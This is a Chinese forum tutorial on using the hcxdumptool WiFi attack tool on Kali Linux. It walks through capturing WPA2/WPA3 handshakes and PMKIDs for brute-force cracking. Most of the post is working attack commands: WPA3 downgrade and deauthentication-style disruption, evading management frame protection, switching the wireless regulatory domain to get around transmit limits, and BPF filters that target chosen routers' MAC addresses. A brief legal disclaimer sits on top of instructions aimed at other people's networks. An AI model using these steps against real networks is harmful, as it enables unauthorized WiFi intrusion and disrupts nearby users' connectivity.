大校
- 注册时间
- 2015-5-1
- 金币
- 16954 个
- 威望
- 12 个
- 荣誉
- 1 个
累计签到:1 天 连续签到:0 天 [LV.20]漫游旅程
|
本帖最后由 上上网 于 2024-2-18 17:02 编辑
声明: 使用此工具前,你必须有攻击网络的权限, 执行持久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。
那些 水滴 奶瓶 CDLINUX 等 淘汰工具随着时代进化, 一些功能已经跟不上了
一种具有降级攻击主动交互式工具。与使用传统Deauth帧注入不同,在捕获过程中,它具有主动发送请求交互功能,确保PSK能被恢复,
如果你捕获握手包非常困难情况, 可以偿试使用, 可能会有怀孕惊喜哦
亮点1:对 一些wifi6 具有WPA3协议的实施降级攻击,捕获的为WPA2握手包,从而仍然可以使用暴力方式破解
亮点2:对一些路由器具有管理帧保护(MFP)的攻击有效,使用其他一些传统Deauth帧注入工具不能捕获这类路由器
,
亮点3:能够从接入点捕获 PMKID
亮点4:可以看到捕获消息, 从而可以知道是否捕获了有效握手包
亮点5:可以实现包含GPS定位等数据信息,(海拨,经度,纬度 等等)
亮点6:具有漫游密钥过度管理功能路由器协议(FT PSK不支持破解), 捕获为WPA2握手
亮点7:能够在2.4GHz上捕获5/6GHz客户端的握手
亮点8:能够捕获来自未连接客户端的握手
亮点9:能够从 WLAN 流量中捕获密码
亮点10:能够阻止完整的 WLAN 流量传输
亮点11:使用随机化MAC地址
亮点12:支持大多数主流用于破解网卡
在初始使用它前, 如果想少走弯路, 都应该继续阅读下去 . . .
由于本篇内容涉及到BPF过滤波器使用, 需要一些802.x1基本知识, 例如需了解 addr1 addr2 addr3
如何在kali使用? 就kali2023-4 为例吧 wifislax64-3.4-final也行
工具hcxdumptool 6.3.2
下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install
有下不了的情况, 下载这个文件放进 KALI 或wifislax64-3.4-final 系统里面任何位置, 然后执行上面命令安装也行
停止接口的服务 (如果需要)
停止
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
开启 (如果需要)
sudo systemctl start NetworkManager
查看国家无线监管域信息
iw reg get
注意: 无线监管域设置是极其重要, 某些监管域信道被限制不允许传输某些数据, 所以它决定了捕获握手是否成功. 失败的重要因素,如检测到雷达,将不会传输
如果检测到国家域代码为00:DFS-UNSET 和监管域:00, 可能会在5GHz和部分2.4GHz 信道上可能无法按预期工作, (会无法捕获在某些被限制频段握手)
抓不了就偿试变换到不同监管域码再进行捕获: 例如: IN(受限极小) 或其他受限制极小国家
执行设置监管域码 例如: IN
sudo iw reg set IN
这不是持久化步骤, 需要持久化必须在配置文件中取消对域注释
通过改变监管域码看到网卡发生了巨大变化, 可以看到下图中完全没有限制在某些频段中传输数据
以上仅是无线监管域部分小知识 , 也是数据是否可以顺利传输最重要一环节
接下来 .
查看一下你要使用网卡接口编号是否对应, 通常接口是默认 wlan0
sudo hcxdumptool -l 或 sudo hcxdumptool -L
查看对应网卡信息命令 sudo hcxdumptool -I wlan0
开始执行捕获命令所有信号握手, ( 如果网卡接口编号是 wlan0 )
sudo hcxdumptool -i wlan0 -F --rds=1
从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 , -i wlan0 网卡接口位, -F 使用网卡支持所有频段, --rds=1 排序, 文件名称会自动默认使用日期时间命名, 如要指定文件名加参数-w SSID.pcapng 可用SSID 或MAC DCAEFB命名
如果信号较差, 又必需要捕获到有效握手, 增大重新攻击重试, 默认值是: attemptapmax=4 attemptclientmax=10
sudo hcxdumptool -i wlan0 -F --rds=1 --attemptclientmax=100 --attemptapmax=100
此时弹出窗口会显示是否捕获到握手详细数据信息示例, 看下图解析
如果要攻击单个路由器
1 > 扫描, 分普通模式 --rcascan=p 及主动模式 --rcascan=a 如果网卡支持主动监控, 主动模式扫描会有信标响应, 可按探测响应计数排序--rds=1
扫描网卡支持2.4Ghz+5Ghz所有信道参数 -F 如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool -i wlan0 -F --rcascan=a --rds=1
或仅扫描指定2.Ghz信道, 不扫描5Ghz信道不用加参数-F 注意对应信道频带: 2.4g信道要加a
sudo hcxdumptool -i wlan0 --rds=1 --rcascan=a -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a
2 > 设置要指定网卡编号为监控模式(如果有插入多块网卡,要对应你自己网卡接口位 -i wlan0), 如果创建BPF过滤器失败, 需要执行一下这命令
sudo hcxdumptool -m wlan0
3 > 创建BPF过滤器, 攻击单个目标MAC: 00:00:00:00:00:00, 按实际自己要攻击MAC地址填写为准, 这只是示例 !
创建BPF命令
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 -ddd >g.bpf
或添加无向探测获取更多信息, 或有助于密码破解 加这固定MAC: ff:ff:ff:ff:ff:ff
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd >g.bpf
如果要攻击2个目标路由器MAC
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 99:bb:99:bb:bb:99 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd >g.bpf
4 > 然后使用伯克利BPF过滤器,执行捕获单个或多个MAC握手命令
sudo hcxdumptool -i wlan0 -F --bpf=g.bpf
有经验用户如要使用对应信道参数-c , 如11 165信道 -c 11a,165b 指定信道情况下不需加-F参数, 更准确地攻击,以减少网卡活动周期优化时间
注意对应信道频带: 2.4g信道要加a 5g信道要加b 6g信道要加c 是必须, 因为WiFi5,6不是唯一信道 。
执行命令
sudo hcxdumptool -i wlan0 -c 11a,165b --bpf=g.bpf
如果要保护自己MAC路由器, 需要创建自己路由器MAC保护
sudo tcpdump -i wlan0 not wlan addr2 cc:cc:cc:cc:cc:cc -ddd >p.bpf
然后执行保护自己, 捕获除自己外所有在范围内握手包
sudo hcxdumptool -i wlan0 -F --rds=1 --bpf=p.bpf
补充捕获5Ghz信号步骤
捕获在你5Ghz网卡支持频段范围内所有信号握手, 由于5Ghz网卡信道活动周期较长, 需较多时间
sudo hcxdumptool -i wlan0 -F --rds=1
如果要攻击5Ghz单个路由器信号
扫描: 分普通模式--rcascan=p 及主动模式--rcascan=a 如果网卡支持主动监控, 主动模式扫描时会有信标响应, 按探测响应计数排序--rds=1
扫描网卡支持所有信道参数 -F
sudo hcxdumptool -i wlan0 -F --rcascan=a --rds=1
或扫描指定5Ghz以上信道, 5g信道要加b 6g信道加c
sudo hcxdumptool -i wlan0 --rds=1 --rcascan=a -c 36b,38b,40b,42b,44b,46b,48b,50b,52b,54b,56b,58b,60b,62b,64b,100b,102b,104b,106b,108b,100b,112b,114b,116b,118b,120b,122b,124b,126b,128b,130b,132b,134b,136b,138b,140b,149b,151b,153b,155b,157b,159b,161b,163b,165b,167b,169b,171b,173b,175b,177b,179b
创建要攻击5Ghz MAC: 00:00:00:00:00:00, 按自己要攻击5Ghz MAC地址填写为准, 这只是示例 !
创建BPF, 可同时监听捕获2.4Ghz和5Ghz握手信号, 只需将路由器2个MAC创建加入BPF过滤器即可, 当攻击掉线时, 无论客户端连接上那个信号都能捕获到它们
创建1个要攻击MAC进BPF过滤器
sudo tcpdump -i wlan0 wlan addr3 000000000003 -ddd >g.bpf
或创建2.4Ghz和5Ghz路由器MAC进过滤器 2.4Ghz MAC: 00:00:00:00:00:00 5Ghz MAC: 00:00:00:00:00:02
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 00:00:00:00:00:02 -ddd >g.bpf
执行命令
sudo hcxdumptool -i wlan0 -F --bpf=g.bpf
或指定对应信道参数攻击更准确, 如11 165信道 -c 11a,165b 以减少网卡活动周期优化时间
注意对应信道频带: 2.4g信道加a 5g信道加b 6g信道加c 是必须, 因为WiFi5,6不是唯一信道 。
然后执行命令
sudo hcxdumptool -i wlan0 -c 11a,165b --bpf=g.bpf
最后等待一下就可捕获到握手包了, 如果在2分钟内捕获不了握手情况(信号好的一般在30秒内即可捕获握手,), 此时就应重新检查MAC是否与信号对应, 或停止后再次重新执行捕获命令, 或检查无线监管域, 硬件, 网卡, 驱动, 系统 等等, 或需要重新插拨USB接口网卡重试,有可能这原因导致的, 特别是在会被无线监管域限制的频段内导致传输失败
不推荐在虚拟机系统使用该工具,有可能因为虚拟接口产生较多问题, 推荐物理硬盘启动, 如U盘启动Kali 内核>6.5 wifislax64 等
捕获文件默认在Home文件夹下 !文件名称是以日期时间命名, 文件格式是pcapng固定格式
以下是旧版< 低于hcxdumptool 6.2.8 一些简单捕获握手命令
1> 扫描
sudo hcxdumptool -i wlan0 --do_rcascan
2> 将网卡设置为监控模式
sudo hcxdumptool -m wlan0
3> 捕获在范围内所有信号握手包
sudo hcxdumptool -i wlan0 -o TP.pcapng --enable_status=15
如写的有不当之处或错误, 请遵循各个版本的hcxdumptool -help为准
补充内容 (2024-5-28 11:23):
自 hcxdumptool6.3.2 之后起版本, 需要安装libpcap依赖
执行以下命令
sudo apt-get update
sudo apt install -y libpcap-dev |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
2
查看全部评分
-
|